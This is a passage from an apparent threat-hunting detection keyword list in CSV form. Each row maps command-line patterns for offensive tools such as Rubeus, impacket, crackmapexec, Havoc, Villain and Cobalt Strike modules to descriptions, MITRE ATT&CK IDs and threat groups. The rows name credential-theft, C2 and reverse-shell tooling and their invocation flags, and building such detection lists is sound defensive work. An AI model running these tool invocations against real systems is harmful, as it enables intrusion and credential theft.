Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-ExfilDataToGitHub.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* giop-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* github repos list --org*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"* github repos list --user *","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"* give-dcsync*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"* give-genericall * -target-sid *","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"* gkrellm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* gmailC2.exe*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" +"* --gmsa-decrypt-lsa *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* go build -o padre .*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" +"* golden * /badpwdcount*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* golden * /ldap *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* golden * /user:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* gopher-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* gophish-*.zip*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z"
+"* 'GPODDITY$' *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
+"* --gpo-id * --domain * --command *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 -
T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
+"* --gpo-id * --gpo-type * --no-smb-server *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
+"* --GPOName * --FilterEnabled --TargetDnsName *","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z"
+"* gpp_autologin*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* gpp_password*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns.
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* gpsd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* GreatSCT/*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses.
This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z"
+"* --greeting * --personalize *--securelink*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z"
+"* -grouper2 -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"* -H * -u * -p * -r *C$/Users*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind.
and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z"
+"* -h *-p * -c cypher.bin -k key.bin*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z"
+"* hack.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"* HackBrowserData","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z"
+"* HackBrowserData*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 -
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","0","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z"
+"* hackergu *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* hadoop-datanode-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* hadoop-jobtracker-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* hadoop-namenode-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* hadoop-secondary-namenode-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* hadoop-tasktracker-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* Hak5.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z"
+"* harvest * /monitorinterval:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license).
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"* -hasbootstraphint *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"* -hashes * -spn * -impersonate *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g.
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"* -hashes lm:nt -gpo-id * -powershell *","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","0","N/A","8","2","180","26","2023-01-20T19:02:09Z","2020-05-10T21:21:27Z"
+"* --hash-type * --attack-mode *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* hashview.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z"
+"* hashview-agent *","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z"
+"* havoc-client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 -
T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"* hbase-master-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* hbase-region-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* hddtemp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* HiddenDesktop.cna*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience.
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
+"* hnap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --hoax-port *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
+"* hollow.x64.*","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode.
hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","0","N/A","10","10","235","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z"
+"* --host * --port * --executable *.exe --command *cmd.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* host -p * --allow-anonymous --protocol https*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet.
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
